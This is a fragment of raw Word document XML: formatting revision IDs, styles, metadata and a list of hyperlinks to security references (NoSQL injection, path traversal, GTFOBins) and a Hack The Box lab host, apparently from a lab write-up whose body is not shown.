    <w:rsid w:val="00F14D28"/>
    <w:rsid w:val="00F15F9D"/>
    <w:rsid w:val="00F20D74"/>
    <w:rsid w:val="00F26082"/>
    <w:rsid w:val="00F273CD"/>
    <w:rsid w:val="00F31C60"/>
    <w:rsid w:val="00F3470A"/>
    <w:rsid w:val="00F4622F"/>
    <w:rsid w:val="00F4770A"/>
    <w:rsid w:val="00F47F18"/>
    <w:rsid w:val="00F55EE3"/>
    <w:rsid w:val="00F5719E"/>
    <w:rsid w:val="00F575DF"/>
    <w:rsid w:val="00F57EC7"/>
    <w:rsid w:val="00F62343"/>
    <w:rsid w:val="00F6442E"/>
    <w:rsid w:val="00F64EA8"/>
    <w:rsid w:val="00F72A35"/>
    <w:rsid w:val="00F75CC9"/>
    <w:rsid w:val="00F76B4F"/>
    <w:rsid w:val="00F859B4"/>
    <w:rsid w:val="00F87D56"/>
    <w:rsid w:val="00F90DFE"/>
    <w:rsid w:val="00F94D8C"/>
    <w:rsid w:val="00FA7011"/>
    <w:rsid w:val="00FB22BC"/>
    <w:rsid w:val="00FB4DE1"/>
    <w:rsid w:val="00FC16BF"/>
    <w:rsid w:val="00FC5ED5"/>
    <w:rsid w:val="00FD2E0F"/>
    <w:rsid w:val="00FD6DE2"/>
    <w:rsid w:val="00FE274A"/>
    <w:rsid w:val="00FE63CA"/>
    <w:rsid w:val="00FF06C7"/>
    <w:rsid w:val="00FF594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4F58"/>
  <w15:docId w15:val="{F946AFC2-B13B-43C1-BEDE-2055803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C4"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Foot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C4"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="007669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7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1852F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B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B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663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950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41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1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243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3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0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0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10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book.hacktricks.xyz/pentesting-web/nosql-injection" TargetMode="External"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.imperva.com/learn/application-security/nosql-injection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hotobomb.htb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techrepublic.com/article/how-to-quickly-give-users-sudo-privileges-in-linu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portswigger.net/web-security/file-path-travers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tfobin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tobomb.htb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tfobins.github.io/gtfobins/docker/" TargetMode="External"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackthebox.com/profile/1321956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book.hacktricks.xyz/pentesting-web/nosql-injec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258-07AF-4815-8E51-A010980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uwar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Khairul Anuwar</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-02-02T07:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-02T07:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>